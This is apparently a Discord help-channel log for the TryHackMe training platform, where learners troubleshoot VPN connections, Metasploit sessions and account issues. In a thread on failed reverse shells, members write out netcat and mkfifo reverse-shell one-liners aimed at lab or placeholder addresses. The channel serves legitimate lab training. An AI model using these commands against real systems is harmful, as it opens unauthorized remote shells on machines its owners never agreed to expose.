Gave +1 Rep to @crystal marlin
hey fellas, can I enroll in multiple paths after completing the current one? also can i get more than one certificate of completions?
Yes and yes (1 per path)
thank you!
Gave +1 Rep to @sand olive
Hello, Who can help me with changing my country?
Thansk,
Check the pins
It's one of the top ones
Thanks
https://tryhackme.com/room/internal
On this machine, when on the http server when i click something instead of taking me to where i clicked it changes the url to "internal.thm"/path i want to go
is this intentional or what lmaoo
Intended
Try adding
ip_here internal.thm
To your /etc/hosts
See what happens
Edited because am a potato
@hollow yew ^


hi guys. I open with firefox the webpage from any practical room and nothing is displayed, but i can see and analyze the source code and the developers tool. Why is that? any missconfiguration? i tried firefox, chrome and ie...
What room for example?
nothing. white screen
but i can open source code and watch developers tool
thats weird
white screen, reloading anytime
Are you using a private vpn provider?
the vpn that offers tryhackme
You don't have to use the vpn just for going on the usual webpage/room page. Have you tried ctrl + F5 for a hard refresh?
y
In case you have the vpn turned on, could you turn it off and try again?
And you are not using any private vpn as well?
Okay, well that doesn't mean that you are not using any private vpn right now 😄 Are you on a VM or an installed operating system?
tried in window os installed, and from kali VM
both
they do the same
is it probably that my router is connected through a vpn?
Uhm, I don't think so.
Mh, maybe try restarting your computer and try again without connecting to the VPN for now.
Also maybe check if you have any kind of anti virus that might block something in your browser.
Make sure to use ctrl + F5 when trying. Sure not a problem, I hope you will figure it out 🙂
hi are those windows machine always that slow or is it because of subscription? 😄
I am needing assistance with Metasploit. I noticed I was not getting any response back to my exploits, so I went backwards and restarted the Metasploit Room. For some reason, the same issue occurs, except it shows me this time that the exploit was run but no session was created. Can someone work with me on this and help me pinpoint my issue?
Are you on your own machine or the attackbox?
Attackbox works, but my machine is the one throwing the error.
Which metasploit room is it?
Actually, any room that requires connecting with Metasploit is not returning a connection. Metasploit room, Ice room, Blaster room, and rooms in Jr Pentester path. First time I went thru the Metasploit room, it worked fine.
Are you using a VM or an installed OS ?
Installed Kali
If you check ifconfig you only have tun0 interface or any extra like tun1, tun2 etc?
Only Tun0 and eth0
Any firewall in place?
not intentionally
Try sudo ifconfig tun0 mtu 1200 and check again if you receive the shell. Maybe don't try it for now with an exploit like eternalblue which might can fail several times.
the exploit in Metasploit room is the Icecast exploit.
tried again but no connection again. Is there a way to "factory reset" my Metasploit? Lol
I'm not sure if the issue is within your metasploit. It's saying exploit complete but no session created, right?
true
What payload are you using?
windows/meterpreter/reverse_tcp. I actually had to reset the machine at one point because it had dropped port 8000.
I'm not quite sure, but I think someone said once that the icecast exploit could mess up the machine after a certain amount of attempts. So maybe restart the target machine, give it enough time to fully boot and then try it again with the mtu set to 1200. Also you might want to try to just catch a simple shell with netcat or metaploit from a target machine where you can ssh into (for example linux fundamentals 2). Just to make sure you can receive rev shells in general.
Ok, I will go back to Linux Fundamentals to test that. Ideas if that can't work?
Mh, check if you can access 10.10.10.10 in your browser, or curl 10.10.10.10/whoami to make sure you are even connected to the vpn, although I guess you are. Double check if the LHOST matches your tun0 IP. Try to regenerate your VPN config or choose a different THM VPN server. Other then that I think I'm out of ideas 😄
Thank you for your help.
Gave +1 Rep to @crystal marlin
Hi, I am unable to subscribe to THM premium because I'm getting a 'cannot access your paypal account' during the checkout process. Can someone help?
Hi, seems like there's a bug(?) on the Offsec pentesting path? I've completed all of it yet I'm still at 80% progress because of the HackPark room even though I completed the room itself
Hello, what should be the Network setting on my Virtual Box with Kali Linux so it does not interfere with my ISP or the Law? Thanks for your help.
depends on where you live and what isp you are using
but most of the time the defaults should probably be okay
As long as you don't try to scan or attack anything that you don't have permission to then you'll be fine
I am going to work only with my own VM's in the Virtual Box.
Then don't worry about the network settings
NAT will be just fine which is default. If you want to cut them off from the internet too then switch the adapter to host only
I have enabled One day streak freeze. Hovering my streak says that 1 day freeze is applied. Does this mean that i can leave for a day without completing questions and it will not cancel my streak right?
It should not, right.
I will pray to that 😅
I pray with you 🙂
I kinda have a problem with the room "Agent Sudo" (https://tryhackme.com/room/agentsudoctf) the box takes ages for me to spin up. (And its a linux box) Afterwards it works and is interactive for like 3-4 minutes then it is not responsible for 1-2 minutes. This repeats over and over again. I already restarted the box twice
What you mean with it's "interactive" for like 3 - 4 mins?
Sorry I meant inactive
It is completely unresponsive not even reacting to pings
I am trying to connect my virtualbox(os kali) to thm but it doesn't seem to be working.
Exiting due to fatal error
I have solved it with black magic
thanks anyone who read this
Well I still don't understand completely? I guess you are at task 1 or 2 ? So have you tried to scan that machine already? Also, are you trying to access that target machine from the attackbox or your own machine?
Connecting to the thm vpn is what you are trying?
yep but thanks I have solved it
Gave +1 Rep to @crystal marlin
The problem is the machine the room is hosted on runs instable. The target machine is most of the time not responsive. Like the apache does not react, ftp connection times out, ssh times out, gobuster cant reach it after around 3% progress through its wordlist. SSH connection to the machine gets closed aswell
I am trying to access it from my own kali vm but I never had a problem with any machine I encountered on thm, yet.
That sounds more like a connection issue then the machine itself. Check if you are successfully connected to the THM VPN by browsing to 10.10.10.10 or doing curl 10.10.10.10/whoami Make sure openvpn is running directly inside your VM and not on your host machine. Check ifconfig to make sure there is only a tun0 interface and not any extra like tun1, tun2 etc. If you have done that and all seems good, try sudo ifconfig tun0 mtu 1200 and then try again to SSH, or ftp.
I will check it out tomorrow thank you for the information. I still have to escalate to root so I will get to this box tomorrow and then I can rule out the the problem is on my connection side if it is still present 🙂 Gn8 for today
Alright, gn8 😴
Does tryhackme automatically takes money if I've subscription and I haven't canceled it before renew date??
My subscription was supposed to end on 22/11/2021 but I can still access vip machines. I don't want subscription this month.
If i cancel subscription will my money (if taken) be returned
Hi all, for some reason my profile now says that I am from Afghanistan and I show up on the Afghanistan leaderboard when I am actually from Australia. My account used to to show up correctly with the Australian Flag. Any way I can change this or get it updated?
Try this link https://tryhackme.com/api/user/update-timezone
Hey!
Is there a way i can gift 1 yr subscription to my friend and use the code AOC2021 to get the discount?
That worked. Thank you!
Gave +1 Rep to @hollow otter
Hey guys wassup! I have a question, does anyone know why when i am connected to the vpn thm via mobile tethering i dont get rev shells? Thanks!
Yesterday I was busy because of some work
And to keep my streak going on I just answered 1 question which was enough to keep my streak going on.
So I just answered 1 question and it even displayed that streak has been increased, but when I opened today it's showing me that all streak is gone now I have to start again from 0.
Why so 😔
Is it just my or the images in the rooms are broken?
I just lost my 60 day streak is there anyway to get it back? 😔
Thanks
Gave +1 Rep to @crystal marlin
I have an issue for everyone to ponder over. I have had no luck with sessions connecting in Metasploit. I have discovered that I am not able to connect with NC either. It states that there are no ports to connect to. I then ran nmap on my THM VPN address and my personal network address; both came back with NO open ports at all. Can anyone explain why this could be?
what's the point of checking open ports on your own device?
unless you're running a server or something
I just tried it because I couldn't get a reverse shell using Netcat
Netcat told me no ports to connect to, when I tried to connect from target machine. This gives me an idea why my listeners never got responses.
So if you first start nc -lnvp 4242 and after that in a new terminal do sudo netstat -tulpn you don't see port 4242 listening?
I can see the port is listening with nc. But target machine can't connect to my machine saying "no port[s] to connect to" . I opened a listener on my machine and logged into the THM machine and used "nc 10.2.102.61 -e /bin.bash" and it says there are no ports to connect to.
Probably because you haven't specified a port. So try nc -e /bin/bash IP PORT
tried it, might have connected, but no response from listener or sender.
they both appear to be waiting on something
What you mean with no response? Did it say something like connection received from * * * * or similar to that?
Have you set the mtu setting I gave you last time?
yes
So after it said connection received, did you try a command like whoami?
it never said connection received
"shell@linux-shell-practice:~$ nc -e /bin.bash 10.2.102.61 4444
(UNKNOWN) [10.2.102.61] 4444 (?) : Connection timed out
"
Listener is still waiting
there's another NC command as well, maybe you can tey that
You are doing /bin.bash instead of /bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
same waiting response, no connection
Ye maybe try the one from thesarthakjain. Meanwhile on your machine, could you do curl 10.10.10.10/whoami and let me know the reply you get to that?
10.2.102.61
Mh
can not remove /tmp/f
On the target machine, could you try nc -e /bin/bash 10.9.189.199 4242 to make sure there is no issue within the target machine.
That's my listener.
you tell me
Ok, got it.
And I might repeat myself, but your listener was started with nc -lnvp 4444, right ?
close - nc -nlvp 4444
Ye, that should make no difference so that seems fine. Could you show me your ifconfig output?
I have to figure out how to screenshot this thing
alt + print I think
quick question, with the THM VPN - we are all basically connected to each other right?
Ye
same subnet pretty much
there ya go
and is there anything stopping anyone from unethically pentest someone's IP?
ethics xD
Your mtu setting is not on 1200 as we have spoken about.
Try that pls.
but to answer your question, I'm pretty sure no, so make sure to stay up to date with software!
thanks
NP!
Did THM remove the "windows" or "linux" sort buttons from the learn >> search page?
Thank you. You pointed out that I had an active firewall when I didn't know I even installed one.
Gave +1 Rep to @crystal marlin
mtu 1500 works again
Great, then you should be good to go now I guess 🙂
until it mysteriously enables itself again..... <insert spooky sounds>
Ye, but this time you know where to look for 🙂 So gl with your metasploit if you continue that room you had to stop on.
Maybe I can finish the Jr Pentest path now
This has been a problem for over a month now. Hehe
Does anyone know the reason why i can't change my country? Actually i didn't change my country however i saw this morning that it has been changed.
Was there a silent coup overnight? Hehe
Hey guys. I have been using VMware workstation for my linux machines the last month but my license expired, can anyone recommend free alts?
I thought VMware was free, maybe it is and i have wrong version
@cyan niche you're probably on vmware workstation pro, try vmware workstation player, that's free I believe.
thank you
Gave +1 Rep to @lament trout
hey is the attackbox provided from tryhackme really slow right now ? cause i am trying to use them and the vnc is giving me like 1 fps .
and my internet connection seems fine everything else is working well its just the attackbox which working slow
I was trying to connect to the Machine from https://tryhackme.com/room/django several times through openvpn and out of the attackbox but even after 10 minutes and serveral attempts of rebooting the Machine i cant reach it.
Please I'm totally lost in owasp top 10, task 26 with flag.txt
which one you dont know
you have to generate encoded oaykiad and use pickle i python
john
use jumbo john and use zip2john to make a file john can understand to crack the password for
what have you tried so far???
Have you solved it meanwhile?
I was stuck on his change private IP to virtual IP....
it is refering to the ip of the tun0 interface on your machine if you use the vpn to connect.... or in the top right corner of the screen in the attackbox
shadow is guessing at least
the file is not encrypted... the zip file is
encrypted zip files lets you view what files are on the inside but not view the contents of said files without using the password to decrypt and extract
Gave +1 Rep to @plush bay
no problem... hope you can crack it easily enough
Hi
yes! thx for asking again. The instructions aren't in the correct order.
Gave +1 Rep to @crystal marlin
No I meant the issue with the machine for the last task not reachable?
i tried it a third time and it was still not possible. i'll try it later again
Just to make sure, how did you try to connect to it?
openvpn and attackbox
Ye, but how did you try to connect to the machine itself? SSH, browser etc. ?
i tried to reach the http-server after this wasnt successfull i tried ssh
so first i tried browser, second ssh
And both failed?
y
K, ye in case you try it again and it's still failing you can ping me here. As I assume you are busy with Hunt right now 😄
humms showdown music
ssh worked now from my kali vm trough vpn 👍
Haven't gotten a response to a ticket in 24 hours, not from THM or PortSwigger.... having some pretty serious issues with ssh login since doing the BurpSuite room - disabled FoxyProxy today... port 22 wasn't showing as open anywhere, finally reset a bunch of things and get it now, but still no password is ever accepted for ssh login
Which burp suite room, provide a link pls as there are a couple.
The issue is showing in all rooms now, but the original BS room (love that acronym for it now...) was The Basics. FoxyProxy sent it all to hell, and nothing's been working properly since...
Well I'm not quite sure what exactly the issue is. You were talking about ssh login? In which burp room is anything about ssh login?
No... ALL rooms ... password fails... I went to a lot of trouble just to be able to get an open port 22 again.. it wasn't showing as open anywhere... found two random threads that helped me a little... now password still isn't being accepted. This happens across ALL rooms
Unless the room is giving you ssh creds and is telling you to ssh into the target machine, you are not supposed to ssh into them.
So, let's say Vulnversity... I'm not getting any access to the machine through browser, ssh, or otherwise... I'm also not asked to gain access any other way in the module... so... ? Why can't I access anything. I figured I needed to ssh to the room
Some of these modules really offer zero instruction, and if you're not subscribed to a path... I mean, I'm starting to think I need to take a proper online course... THM seems to be all over the place with no real track to progress, so I don't know what I'm supposed to be doing otherwise if it gives me no info to work with...
Well vulnversity might be a different story, so lets stick with the burp suite rooms. First of all, are you trying to connect to the target machine through you own machine or through the web based attackbox?
Well if you are new to THM you might want to start with the tutorial room to understand how to use the platform. https://tryhackme.com/room/tutorial But also you can always ask here in discord if you need help with something.
I've done that... I've used the site a bit already, but thank you
Okay, so regarding the burp suite room. Start the target machine and then try to navigate to the given IP inside your VMs browser.
Okay, give me a moment, I closed everything out from frustration of nothing working. You said no ssh in BS room, though, so is that the best place to test this?
No ssh, right. Well it doesn't matter where we are going to test it right now, but I thought you had issues with that room, so lets stick with that room.
No, that was the room I did before I started having trouble everywhere else... if that's where you want me to go, though, that's what I'll do
Well then just open whatever room you are having issues with connecting right now, give me the link of that room and then we are going to try to solve it for that room.
Alright, so what exactly is the issue in that room right now?
I'm on the gobuster task. In the walkthrough, DarkSec connects to the address in his browser to show that's where the upload form is. I can't connect to anything at the machine's IP address.
Okay, so can you open 10.10.10.10 in your VMs browser?
Jon suggested I come here, because originally this was a matter of having no port 22 ever showing up... I SEEM to have gotten around that, but still having connection issues, it seems...
One moment...
Yep, that connected
And what's the full URL you try to open for that rooms webpage?
wtf... I just entered it myself, and it connected.... psshhhh
IP:3333/internal for the internal folder gobuster found
shit... well... weird
At least it seems you are not having connection issues, just the confusion about the ssh part 🙂
So to be clear, we are not meant to be able to ssh into all rooms unless specifically instructed? I guess I thought it was standard to connect to each room's machine that way, because in early rooms, it is treated as standard fare...
Right, they are most of the time just machines you have to attack yourself and gain a foothold through an exploit or similar.
I guess it concerns me when the password is constantly rejected, and Jon mentioned bringing that here... I don't want to be condescended over "confusion," I have been doing as I've done in all other rooms, with no information anywhere to suggest different
Crap, now the room wants me to use BurpSuite, which seemed to kick off all my proxy misconfigurations...
Oh no, it's all good, that's why you can just reach out to ask here in discord 🙂
Well, I certainly appreciate your time and help! At least I feel better about this, hopefully PortSwigger will get back to that ticket so I can use BurpSuite without it screwing up other things.... Thank you!
Btw I'm not quite sure what exactly the issue with burp is you have, but you could just reinstall foxyproxy and burp itself and use https://tryhackme.com/room/burpsuitebasics which shows you how to set up foxyproxy.
hello, I'm on network services 2 and I'm starting the NFS section 3: Enumerating NFS, where I need to mount some shares. I've mounted the shares, but there's no folders inside. Apparently, I need to find some keys that give me access to a remote server but there's nothing in the single folder. Can anyone please help?
anyone decent with tor ?
what command are you using to mount the share?
hey so this isn't too important honestly
but the thingy that tells u how many questions you've answered in a day and displays ur streak isn't working
it's saying I haven't answered a single question today when I've completed multiple rooms today
Refresh the Page
I can't reach imgur and it's been weeks already
So for some reason I am now able to deploy an attackbox... It says that I have used it for over an hour, but I haven't even open it it for 15 mins..
Is this some weird glitch?
Oh dang... That sucks
Hey!
Is there a way I can gift 1 yr subscription to my friend and use the code AOC2021 to get the discount?
Sounds like your ISP is blocking it, nothing we can do unfortunately
anyone knows how to generate new tryhackme token for discord? I created this new discord account and now trying to reconnect it. my old discord got deleted already by the discord moderators
hello, Is not a big issue but It look like I'm not able to configure the country on my profile, it always go back to the first country of the list Afganistan
Try this link https://tryhackme.com/api/user/update-timezone
it goes to the dashboard
Hi guys, I'm trying to connect to openvpn on kali linux, however I can't get on, I get the error
Options error: In [CMD-LINE]:1: Error opening configuration file: /Downloads/IrScrubzz(1).ovpn
Use --help for more information.
Seems the path to your ovpn file is not right
Could you change into the Downloads folder and do pwd ?
Yes so the path would be /home/kali/Downloads/IrScrubzz(1).ovpn
Thank you, that worked.
How To I Am Test my Web Host Security ? IS There Anyone Try to hit my target To i Am Check My Web SEcurity
no.
Where do I change my country?
I'm using Parrot inside of a VM (Virtual Box), every time I shut down the machine it resets my resolution to 800x600. Is there a fix for this? Not a massive issue but causes a lot of lag when I login
Hey i can't download my OpenVPN file for the network wreath
It redirect me on the page :
Need some help here. I'm unable to connect to my OpenVPN Profile.
It shows - Error message: ovpnagent: request error
hello cant seem to reset upload
I cancelled the upload now I cant do it again
theres a typo BTW
What's the full command you try ?
I didn't try any command, I just tried to connect to my profile but it displays that error.
Could you show a screenshot of that?
Sure!
???
Oh you are not on linux? Mh, I have never used it outside of linux, so I'm not sure if there is some kind of log or similar to check on what the issue is.
Oh, okay. No, I'm on Windows.
Anyways, thanks for your response! @crystal marlin
Gave +1 Rep to @crystal marlin
Sure not a problem, in case you look up on where to find the log, you can send me a DM with it and we can look into it.
Sure I will! 👍
@naive dust is parrot supported for VM?
oh, so they do have OVA file now, I remember using the ISO and having similar issues in VM, are you using OVA? @naive dust
Hi... Ice Room... Task 4... only getting one vulnerability showing running post/local/recon/multi_exploit_suggester - walkthrough shows 31! The one I'm getting is not the one appropriate for the Task either.... I have a screenshot from last night, and another from today... resetting everything didn't help either
Only thing I've newly noticed is that all walkthroughs are using msf5, I have msf6 (just downloaded latest version, of course). Maybe the module needs to be updated for the newest version of Metasploit? Or I am actually expected to downgrade just to complete the Room?
I'm a dumbass. I used ls instead of ls -a so I didn't see the files. Thank you 🙂
Gave +1 Rep to @shy jungle
Not dumb, it happens....
OVA Security I think
You can just use the attackbox to have msf5 for that task, or grab the answer from a walkthrough. Beside that exploit suggester part I think you can do everything with msf6 too.
When trying to start the machine I can't see the public IP. Terminating the machine and restarting it didn't help
Does anyone know what the problem might be?
What machine are you trying to start?
Kali
Okay, so one of the web based attacking machines? But what are you trying to do with that IP ?
Yes, for the remote desktop
Ah okay. Well as far as I know there is no public IP to access them, maybe someone else will prove me wrong. But you most probably have to connect to the THM VPN and go with the private IP to connect to it.
Okay
But just to let you know, you can also just use these web based machines within your browser. Also putting them on full screen.
Hi guys.
I'm running kali on a VM and my openvpn suddenly stopped working yesterday. I've downloaded new config files but I keep getting the same error :
oh derp
I wasn't running as sudo
Well... you need to use the exploit then... I mean, I guess I can use the AttackBox, but that's more of a workaround.... the modules should really reflect current tools, don't you think? I've seen other threads online about differences in msf5 and msf6, so there may very well be other Rooms affected as well. It would be a suggestion to the site devs to update modules to reflect usage of current versions of the tools they're asking us to use... would seem to be appropriate
And of course, now I'm being told I need to subscribe, because I had to use the Attackbox earlier for another workaround... modules should really be updated, or at least contain notes about the versions of tools they require...
If I remember correctly that exploit is available on msf6 too, it's just the exploit suggester not suggesting it on msf6. But if you have feedback in regards to such things, you can just send a feeback about that, I think they appreciate any feedback. #feedback-and-ideas
hmm for some reason I can't ping my machine for network services 2, works perfectly through attackbox, but fails from a local kali vm
are you connected to the vpn?
yeah
can you send some screenshots?

